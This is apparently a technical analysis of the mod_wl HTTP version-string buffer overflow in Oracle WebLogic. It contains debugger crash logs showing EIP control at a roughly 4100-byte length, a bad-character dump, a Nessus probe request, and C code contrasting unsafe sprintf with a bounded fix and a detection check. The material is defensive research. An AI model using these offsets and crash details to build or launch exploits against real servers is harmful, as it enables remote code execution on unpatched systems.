Oracle mod_wl HTTP POST Request Remote Buffer Overflow Vulnerability
Description
Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
Technical Analysis
Details
BEA WebLogic 8.1 + Apache
http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html
First crash
(328.c38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll -
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8
eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0         ov up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010a03
RPCRT4!NdrVaryingArrayUnmarshall+0x81:
77ea4126 008945107416    add     byte ptr [ecx+16741045h],cl ds:0023:59b75388=??
0:132> .symfix
0:132> .reload
Reloading current modules
.............................................
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0:132> kb
ChildEBP RetAddr  Args to Child
0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a
0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f
0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
More controlled crash: length 4100
ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a
0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f
0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
mod_wl detection via Nessus
weblogic_mod_wl_overflow.nasl: "TITLE>Weblogic Bridge Message" >< res[2] ||
POST /index.jsp HTTP/1.1
Host: 192.168.1.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: -1

TML>
<HEAD>
<TITLE>Weblogic Bridge Message
</TITLE>
</HEAD>
<BODY>
<H2>Failure of server APACHE bridge:</H2><P>
<hr><PRE>Internal Server failure, APACHE plugin. Cannot continue.</PRE>
<hr><BR><B>Build date/time:</B> <I>Jun 16 2006 15:14:11</I>
<P><HR><B>Change Number:</B> <I>779586</I>
</BODY>
</HTML>
<HTML>
<HEAD>
<TITLE>Weblogic Bridge Message
mod_wl overflow
.text:1000E751 push    ecx             ; it should be HTTP/1.1 but.... failed :)
.text:1000E752 push    edx
.text:1000E753 mov     edx, [ebp+214h]
.text:1000E759 push    edx
.text:1000E75A push    offset aSSS     ; "%s %s %s\r\n"
.text:1000E75F push    eax             ; Dest
.text:1000E760 call    ds:sprintf      ; here is where overflow happens!
GET EIP on RET
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mod_wl_20+0xedeb:
1000edeb 81c41c100000    add     esp,101Ch
0:244> db esp
0440c7b8  1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00  ............J...
0440c7c8  48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e  Host: 192.168.1.
0440c7d8  31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a  130..User-Agent:
0440c7e8  20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f   Mozilla/4.0 (co
0440c7f8  6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36  mpatible; MSIE 6
0440c808  2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35  .0; Windows NT 5
0440c818  2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70  .1)..Content-Typ
0440c828  65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78  e: application/x
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mod_wl_20+0xedf1:
1000edf1 c3              ret
0:244> db esp
0440d7d4  41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08  AAAAAAAA........
0440d7e4  09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a  ................
0440d7f4  1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a  ..... !"#$%&'()*
0440d804  2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a  +,-./0123456789:
0440d814  3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b  ;<=>@ABCDEFGHIJK
0440d824  4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b  LMNOPQRSTUVWXYZ[
0440d834  5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b  \]^_`abcdefghijk
0440d844  6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b  lmnopqrstuvwxyz{
0:244> t
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
41414141 ??              ???
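The assessment above traces the crash to an unbounded sprintf("%s %s %s\r\n") of the request line, with the HTTP version token as the oversized field. Added illustration, not the assessment's or Oracle's code: the unsafe pattern beside a bounded form that refuses rather than truncates, plus a front-end request-line check a proxy or WAF could apply; the 1024-byte buffer, the 16-byte version limit and all function names are assumptions for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LINE_BUF 1024        /* illustrative fixed-size buffer; not mod_wl's real size */
#define MAX_VERSION_LEN 16   /* "HTTP/1.1" is 8 bytes; a real version token is never long */

/* The pattern in the disassembly above: sprintf("%s %s %s\r\n") into a fixed
 * buffer with no bound, so an oversized version token writes past the end. */
int format_line_unsafe(char *dst, const char *method, const char *uri, const char *version)
{
    return sprintf(dst, "%s %s %s\r\n", method, uri, version);
}

/* Hardened form: snprintf returns the length it wanted to write, so a value
 * >= dstsize means the unbounded version would have overflowed. Refuse, do not truncate. */
int format_line_safe(char *dst, size_t dstsize, const char *method, const char *uri, const char *version)
{
    int n = snprintf(dst, dstsize, "%s %s %s\r\n", method, uri, version);
    if (n < 0 || (size_t)n >= dstsize) {
        dst[0] = '\0';
        return -1;
    }
    return n;
}

/* Front-end / WAF style check on a raw request line: the third token must start
 * with "HTTP/" and be short. Returns 1 if suspicious, 0 if it looks normal. */
int request_line_suspicious(const char *line)
{
    const char *sp1 = strchr(line, ' ');
    const char *sp2 = sp1 ? strchr(sp1 + 1, ' ') : NULL;
    if (!sp2) return 1;
    const char *ver = sp2 + 1;
    size_t vlen = strcspn(ver, "\r\n");
    return (vlen > MAX_VERSION_LEN || strncmp(ver, "HTTP/", 5) != 0) ? 1 : 0;
}

/* Constructs a request line whose version token is n bytes of 'A' (like the
 * length-4100 crash above) and reports whether both defences reject it. */
int oversized_version_is_caught(size_t n)
{
    char *raw = malloc(n + 32), out[LINE_BUF];
    if (!raw) return -1;
    memset(raw, 'A', n);
    raw[n] = '\0';
    int refused = format_line_safe(out, sizeof out, "POST", "/index.jsp", raw) < 0;
    memmove(raw + 16, raw, n + 1);             /* make room for "POST /index.jsp " */
    memcpy(raw, "POST /index.jsp ", 16);
    strcat(raw, "\r\n");
    int flagged = request_line_suspicious(raw);
    free(raw);
    return refused && flagged;
}
```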
General Information
Products
- apache connector in weblogic server
- weblogic server
- weblogic server 10.0
- weblogic server 10.0 mp1
- weblogic server 3.1.8
- weblogic server 4.0
- weblogic server 4.0.4
- weblogic server 4.5
- weblogic server 4.5.1
- weblogic server 4.5.2
- weblogic server 5.1
- weblogic server 6.0
- weblogic server 6.1
- weblogic server 7.0
- weblogic server 7.0.0.1
- weblogic server 8.1
- weblogic server 9.0
- weblogic server 9.1
- weblogic server 9.2